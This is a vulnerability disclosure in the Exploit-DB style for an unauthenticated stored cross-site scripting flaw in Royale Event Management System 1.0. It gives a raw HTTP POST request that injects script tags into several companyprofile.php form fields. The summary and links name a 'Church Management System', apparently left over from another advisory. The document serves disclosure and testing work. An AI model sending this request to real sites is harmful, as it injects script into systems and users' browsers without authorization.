Royale Event Management System 1.0 Cross Site Scripting

`# Exploit Title: Royale Event Management System 1.0 - Cross-site Scripting  
Stored (unauthenticated)  
# Date: 17/03/2022  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html  
# Version: 1.0  
# Tested on: Linux  
  
Title:  
================  
Royale Event Management System 1.0 - Cross-site Scripting Stored  
(unauthenticated)  
  
  
Summary:  
================  
One Church Management System is affected by Cross-site Scripting  
vulnerability due to poor hygiene in certain parameters. The attacker could  
leverage this flaw to inject arbitrary javascript code to manipulate the  
victim's browser capabilities.  
  
  
Severity Level:  
================  
6.5 (Medium)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  
  
  
Affected Product:  
================  
Royale Event Management System v1.0  
  
  
Steps to Reproduce:  
================  
  
* companyprofile.php XSS (unauthenticated) PoC:  
  
POST /royal_event/companyprofile.php HTTP/1.1  
Host: target.com  
Content-Length: 187  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://target.com/royal_event/churchprofile.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
companyname="><script>alert("XSS")</script>&regno="><script>alert("XSS")</script>&companyaddress="><script>alert("XSS")</script>&companyemail="><script>alert("XSS")</script>&country=India&mobilenumber=%2B919423979339&submit=  
`